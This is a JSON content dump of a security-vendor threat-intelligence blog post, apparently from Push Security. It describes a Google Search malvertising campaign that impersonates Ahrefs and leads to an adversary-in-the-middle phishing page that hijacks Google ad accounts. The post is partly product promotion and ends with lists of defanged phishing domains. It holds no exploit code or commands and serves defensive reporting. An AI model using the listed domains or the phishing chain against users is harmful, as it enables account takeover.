Ads”",[3002],{"type":267},{},{"nodeType":247,"value":3005,"marks":3006,"data":3007}," in Google Search. ",[],{},{"nodeType":322,"data":3009,"content":3010},{},[3011],{"nodeType":243,"data":3012,"content":3013},{},[3014,3018,3027],{"nodeType":247,"value":3015,"marks":3016,"data":3017},"A campaign using sophisticated ",[],{},{"nodeType":259,"data":3019,"content":3021},{"uri":3020},"https://pushsecurity.com/blog/uncovering-a-calendly-themed-phishing-campaign/",[3022],{"nodeType":247,"value":3023,"marks":3024,"data":3026},"Calendly-themed phishing lures",[3025],{"type":267},{},{"nodeType":247,"value":3028,"marks":3029,"data":3030}," targeting marketing professionals.",[],{},{"nodeType":274,"data":3032,"content":3036},{"target":3033},{"sys":3034},{"id":3035,"type":279,"linkType":280},"1ThnhFZQIhzV179qclvzFH",[],{"nodeType":243,"data":3038,"content":3039},{},[3040],{"nodeType":247,"value":3041,"marks":3042,"data":3043},"Now, we’ve seen the Google Ads malvertising campaign expand to run additional ads impersonating Ahrefs, an AI marketing platform. Crucially, employees with access to Ahrefs are highly likely to also have access to Google Ads, meaning that attackers can reliably target Google accounts via Ahrefs. ",[],{},{"nodeType":243,"data":3045,"content":3046},{},[3047],{"nodeType":247,"value":3048,"marks":3049,"data":3050},"You can see a demo of the phishing chain below. ",[],{},{"nodeType":274,"data":3052,"content":3056},{"target":3053},{"sys":3054},{"id":3055,"type":279,"linkType":280},"2XjyySGldgl9uPA7CZRms8",[],{"nodeType":274,"data":3058,"content":3062},{"target":3059},{"sys":3060},{"id":3061,"type":279,"linkType":280},"yB12nGF91iq15GoHWItaX",[],{"nodeType":274,"data":3064,"content":3068},{"target":3065},{"sys":3066},{"id":3067,"type":279,"linkType":280},"2NK29DaTd93kOctyWxV0RT",[],{"nodeType":283,"data":3070,"content":3071},{},[],{"nodeType":287,"data":3073,"content":3074},{},[3075],{"nodeType":247,"value":3076,"marks":3077,"data":3079},"Attack breakdown",[3078],{"type":294},{},{"nodeType":243,"data":3081,"content":3082},{},[3083],{"nodeType":247,"value":3084,"marks":3085,"data":3086},"Users searching for “ahrefs” on Google Search were served with a fake ad impersonating Ahrefs, hosted on Squarespace, a legitimate website building and hosting platform. Previously, we’d seen this campaign use hosting sites Odoo and Kartra to similar effect. ",[],{},{"nodeType":274,"data":3088,"content":3092},{"target":3089},{"sys":3090},{"id":3091,"type":279,"linkType":280},"59dhFey5rahm5sA20NudTl",[],{"nodeType":243,"data":3094,"content":3095},{},[3096],{"nodeType":247,"value":3097,"marks":3098,"data":3099},"Upon clicking the link, the victim was taken to a clone of the real Ahrefs site. Crucially, you can see that the domain is not the official Ahrefs domain. ",[],{},{"nodeType":274,"data":3101,"content":3105},{"target":3102},{"sys":3103},{"id":3104,"type":279,"linkType":280},"48fQUiJXC1qACKUUPDliS5",[],{"nodeType":274,"data":3107,"content":3111},{"target":3108},{"sys":3109},{"id":3110,"type":279,"linkType":280},"77iqOW1jDVt5Oxw8qTwnKG",[],{"nodeType":243,"data":3113,"content":3114},{},[3115],{"nodeType":247,"value":3116,"marks":3117,"data":3118},"However, the site is not fully interactable beyond the front page. Clicking on any link takes the user to a Google sign-in page. ",[],{},{"nodeType":274,"data":3120,"content":3124},{"target":3121},{"sys":3122},{"id":3123,"type":279,"linkType":280},"7t9BoUyIFN8dlBDksjsYlD",[],{"nodeType":243,"data":3126,"content":3127},{},[3128,3132,3139],{"nodeType":247,"value":3129,"marks":3130,"data":3131},"This is in fact an AITM phishing page that is designed to hijack the victim’s Google account. Entering credentials and completing the MFA check will result in the attacker stealing the app session and effectively taking over the account. The phishing kit used matches ",[],{},{"nodeType":259,"data":3133,"content":3134},{"uri":2997},[3135],{"nodeType":247,"value":3136,"marks":3137,"data":3138},"the previous malvertising detected impersonating Google Ads",[],{},{"nodeType":247,"value":2281,"marks":3140,"data":3141},[],{},{"nodeType":283,"data":3143,"content":3144},{},[],{"nodeType":287,"data":3146,"content":3147},{},[3148],{"nodeType":247,"value":3149,"marks":3150,"data":3152},"Why are attackers targeting ad manager accounts?",[3151],{"type":294},{},{"nodeType":243,"data":3154,"content":3155},{},[3156],{"nodeType":247,"value":3157,"marks":3158,"data":3159},"Ad Manager accounts on platforms like Google, Facebook, and LinkedIn have become lucrative targets for cybercriminals. By compromising these accounts, attackers can exploit the digital advertising ecosystem in various ways for financial gain. ",[],{},{"nodeType":243,"data":3161,"content":3162},{},[3163],{"nodeType":247,"value":3164,"marks":3165,"data":3166},"The ad industry’s scale makes it attractive to fraud. Estimates suggest digital ad fraud cost advertisers tens of billions, potentially nearing $100 billion or more, with projections reaching $172 billion by 2028.",[],{},{"nodeType":243,"data":3168,"content":3169},{},[3170],{"nodeType":247,"value":3171,"marks":3172,"data":3173},"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized illicitly. The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",[],{},{"nodeType":243,"data":3175,"content":3176},{},[3177],{"nodeType":247,"value":3178,"marks":3179,"data":3180},"Pretty much every enterprise today advertises their services via Google ads — this makes attacks on these accounts pretty much a unanimous problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the customer portfolio. ",[],{},{"nodeType":274,"data":3182,"content":3186},{"target":3183},{"sys":3184},{"id":3185,"type":279,"linkType":280},"1WPbstxHtdjnAKpF1rhCpW",[],{"nodeType":243,"data":3188,"content":3189},{},[3190,3194,3202],{"nodeType":247,"value":3191,"marks":3192,"data":3193},"Learn more about why attackers are targeting ad manager accounts ",[],{},{"nodeType":259,"data":3195,"content":3197},{"uri":3196},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis",[3198],{"nodeType":247,"value":3199,"marks":3200,"data":3201},"in our blog post",[],{},{"nodeType":247,"value":2281,"marks":3203,"data":3204},[],{},{"nodeType":283,"data":3206,"content":3207},{},[],{"nodeType":287,"data":3209,"content":3210},{},[3211],{"nodeType":247,"value":3212,"marks":3213,"data":3215},"Why malvertising? ",[3214],{"type":294},{},{"nodeType":243,"data":3217,"content":3218},{},[3219],{"nodeType":247,"value":3220,"marks":3221,"data":3222},"Malvertising scams happen across lots of different sites, but the most common platform we see targeted is Google Search. This takes advantage of users browsing to find a website and clicking the first link that appears — in this case a fake sponsored link taking you to the attacker’s page. ",[],{},{"nodeType":243,"data":3224,"content":3225},{},[3226,3230,3239,3243,3252,3255,3264,3268,3277],{"nodeType":247,"value":3227,"marks":3228,"data":3229},"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. Malvertising is an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and ",[],{},{"nodeType":259,"data":3231,"content":3233},{"uri":3232},"https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/",[3234],{"nodeType":247,"value":3235,"marks":3236,"data":3238},"ClickFix",[3237],{"type":267},{},{"nodeType":247,"value":3240,"marks":3241,"data":3242}," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search). This isn’t just targeting ad manager accounts — last year, we reported on campaigns impersonating ",[],{},{"nodeType":259,"data":3244,"content":3246},{"uri":3245},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack/",[3247],{"nodeType":247,"value":3248,"marks":3249,"data":3251},"TradingView",[3250],{"type":267},{},{"nodeType":247,"value":809,"marks":3253,"data":3254},[],{},{"nodeType":259,"data":3256,"content":3258},{"uri":3257},"https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/",[3259],{"nodeType":247,"value":3260,"marks":3261,"data":3263},"Microsoft Office 365",[3262],{"type":267},{},{"nodeType":247,"value":3265,"marks":3266,"data":3267},", and ",[],{},{"nodeType":259,"data":3269,"content":3271},{"uri":3270},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers/",[3272],{"nodeType":247,"value":3273,"marks":3274,"data":3276},"Onfido",[3275],{"type":267},{},{"nodeType":247,"value":3278,"marks":3279,"data":3280},", to name a few. ",[],{},{"nodeType":243,"data":3282,"content":3283},{},[3284],{"nodeType":247,"value":3285,"marks":3286,"data":3287},"There’s a tendency to see malvertising as a more random attack, but Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",[],{},{"nodeType":243,"data":3289,"content":3290},{},[3291],{"nodeType":247,"value":3292,"marks":3293,"data":3294},"Because these attacks completely circumvent the traditional phishing detection surface (email) and often happen entirely over the internet (meaning no endpoint security controls can come into play) the only way to reliably detect and stop these attacks is to intercept them where they happen — in the user’s web browser. ",[],{},{"nodeType":283,"data":3296,"content":3297},{},[],{"nodeType":287,"data":3299,"content":3300},{},[3301],{"nodeType":247,"value":3302,"marks":3303,"data":3305},"How Push stopped the attack",[3304],{"type":294},{},{"nodeType":243,"data":3307,"content":3308},{},[3309],{"nodeType":247,"value":3310,"marks":3311,"data":3312},"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser, where Push is waiting to detect and block the attack. Even if the page has never been previously flagged as suspicious or malicious, Push analyses the page in real time and blocks it — protecting against the latest zero-day threats.  ",[],{},{"nodeType":243,"data":3314,"content":3315},{},[3316],{"nodeType":247,"value":3317,"marks":3318,"data":3319},"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and shuts it down.",[],{},{"nodeType":243,"data":3321,"content":3322},{},[3323],{"nodeType":247,"value":3324,"marks":3325,"data":3326},"Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":243,"data":3328,"content":3329},{},[3330,3333,3340,3343,3350],{"nodeType":247,"value":796,"marks":3331,"data":3332},[],{},{"nodeType":259,"data":3334,"content":3335},{"uri":801},[3336],{"nodeType":247,"value":804,"marks":3337,"data":3339},[3338],{"type":267},{},{"nodeType":247,"value":1907,"marks":3341,"data":3342},[],{},{"nodeType":259,"data":3344,"content":3345},{"uri":827},[3346],{"nodeType":247,"value":830,"marks":3347,"data":3349},[3348],{"type":267},{},{"nodeType":247,"value":580,"marks":3351,"data":3352},[],{},{"nodeType":283,"data":3354,"content":3355},{},[],{"nodeType":287,"data":3357,"content":3358},{},[3359],{"nodeType":247,"value":596,"marks":3360,"data":3362},[3361],{"type":294},{},{"nodeType":243,"data":3364,"content":3365},{},[3366,3369,3376],{"nodeType":247,"value":604,"marks":3367,"data":3368},[],{},{"nodeType":259,"data":3370,"content":3371},{"uri":609},[3372],{"nodeType":247,"value":612,"marks":3373,"data":3375},[3374],{"type":267},{},{"nodeType":247,"value":617,"marks":3377,"data":3378},[],{},{"nodeType":243,"data":3380,"content":3381},{},[3382],{"nodeType":247,"value":3383,"marks":3384,"data":3385},"That said, the domains observed in this chain were:",[],{},{"nodeType":318,"data":3387,"content":3388},{},[3389,3399,3409,3419],{"nodeType":322,"data":3390,"content":3391},{},[3392],{"nodeType":243,"data":3393,"content":3394},{},[3395],{"nodeType":247,"value":3396,"marks":3397,"data":3398},"comandd-ok[.]com",[],{},{"nodeType":322,"data":3400,"content":3401},{},[3402],{"nodeType":243,"data":3403,"content":3404},{},[3405],{"nodeType":247,"value":3406,"marks":3407,"data":3408},"ahrefs-ac.squarespace[.]com",[],{},{"nodeType":322,"data":3410,"content":3411},{},[3412],{"nodeType":243,"data":3413,"content":3414},{},[3415],{"nodeType":247,"value":3416,"marks":3417,"data":3418},"ahrefs-seo-app.squarespace[.]com",[],{},{"nodeType":322,"data":3420,"content":3421},{},[3422],{"nodeType":243,"data":3423,"content":3424},{},[3425],{"nodeType":247,"value":3426,"marks":3427,"data":3428},"slgn-ahrefs-app-com.squarespace[.]com",[],{},{"nodeType":243,"data":3430,"content":3431},{},[3432],{"nodeType":247,"value":3433,"marks":3434,"data":3435},"[Update 24th February] We also observed the following new domains:",[],{},{"nodeType":318,"data":3437,"content":3438},{},[3439,3449,3459,3469],{"nodeType":322,"data":3440,"content":3441},{},[3442],{"nodeType":243,"data":3443,"content":3444},{},[3445],{"nodeType":247,"value":3446,"marks":3447,"data":3448},"www-ahrefs-seo-ads[.]surge.sh",[],{},{"nodeType":322,"data":3450,"content":3451},{},[3452],{"nodeType":243,"data":3453,"content":3454},{},[3455],{"nodeType":247,"value":3456,"marks":3457,"data":3458},"web-semrush-seo-wold[.]surge[.]sh",[],{},{"nodeType":322,"data":3460,"content":3461},{},[3462],{"nodeType":243,"data":3463,"content":3464},{},[3465],{"nodeType":247,"value":3466,"marks":3467,"data":3468},"contabelforeehc[.]com",[],{},{"nodeType":322,"data":3470,"content":3471},{},[3472],{"nodeType":243,"data":3473,"content":3474},{},[3475],{"nodeType":247,"value":3476,"marks":3477,"data":3478},"contabelfore[.]com",[],{},{"nodeType":243,"data":3480,"content":3481},{},[3482],{"nodeType":247,"value":3483,"marks":3484,"data":3485},"In addition, the following domains were previously associated with the attacks we detected in December:",[],{},{"nodeType":318,"data":3487,"content":3488},{},[3489,3499,3509,3519,3529,3539,3549],{"nodeType":322,"data":3490,"content":3491},{},[3492],{"nodeType":243,"data":3493,"content":3494},{},[3495],{"nodeType":247,"value":3496,"marks":3497,"data":3498},"ads-adsword1.odoo[.]com",[],{},{"nodeType":322,"data":3500,"content":3501},{},[3502],{"nodeType":243,"data":3503,"content":3504},{},[3505],{"nodeType":247,"value":3506,"marks":3507,"data":3508},"sing-operador2[.]click/accounts/v3/login",[],{},{"nodeType":322,"data":3510,"content":3511},{},[3512],{"nodeType":243,"data":3513,"content":3514},{},[3515],{"nodeType":247,"value":3516,"marks":3517,"data":3518},"adsgooglie.odoo[.]com/",[],{},{"nodeType":322,"data":3520,"content":3521},{},[3522],{"nodeType":243,"data":3523,"content":3524},{},[3525],{"nodeType":247,"value":3526,"marks":3527,"data":3528},"word4only[.]online/",[],{},{"nodeType":322,"data":3530,"content":3531},{},[3532],{"nodeType":243,"data":3533,"content":3534},{},[3535],{"nodeType":247,"value":3536,"marks":3537,"data":3538},"adsloginacess.kartra[.]com/page/oeN7",[],{},{"nodeType":322,"data":3540,"content":3541},{},[3542],{"nodeType":243,"data":3543,"content":3544},{},[3545],{"nodeType":247,"value":3546,"marks":3547,"data":3548},"ads-o.odoo[.]com",[],{},{"nodeType":322,"data":3550,"content":3551},{},[3552],{"nodeType":243,"data":3553,"content":3554},{},[3555],{"nodeType":247,"value":3556,"marks":3557,"data":3558},"operador8-ads[.]lat/accounts/v3/login/",[],{},{"nodeType":243,"data":3560,"content":3561},{},[3562],{"nodeType":247,"value":763,"marks":3563,"data":3565},[3564],{"type":294},{},"Google Search malvertising campaign continues, now impersonating Ahrefs","New samples linked to a Push-tracked malvertising campaign detected, targeting Google accounts via an Ahrefs lure. ","2026-01-12T00:00:00.000Z","google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"items":3571},[3572,3574],{"sys":3573,"name":1933},{"id":1932},{"sys":3575,"name":1929},{"id":1928},{"items":3577},[3578],{"fullName":232,"firstName":233,"jobTitle":234,"profilePicture":3579},{"url":236},"tiktok-phishing","blog/tiktok-phishing",{"json":3583},{"data":3584,"content":3585,"nodeType":239},{},[3586],{"data":3587,"content":3588,"nodeType":243},{},[3589],{"data":3590,"marks":3591,"value":3592,"nodeType":247},{},[],"We’ve identified a new wave of AITM phishing pages designed to hijack TikTok accounts. This seems like a weird target at first glance, but TikTok accounts are ripe for abuse in malvertising scams. ","Investigating a new wave of AITM phishing pages designed to hijack TikTok accounts.",{"id":3595,"publishedAt":3596},"1iOnp8gcu1tEUvkqOZsdFd","2026-03-26T07:59:36.622Z",{"items":3598},[3599,3601],{"sys":3600,"name":1929},{"id":1928},{"sys":3602,"name":1933},{"id":1932},"22iCHf4hLN9rrJs5qqxQQmTBcdgSCs6PyZkFh53Wbww",1784196731117]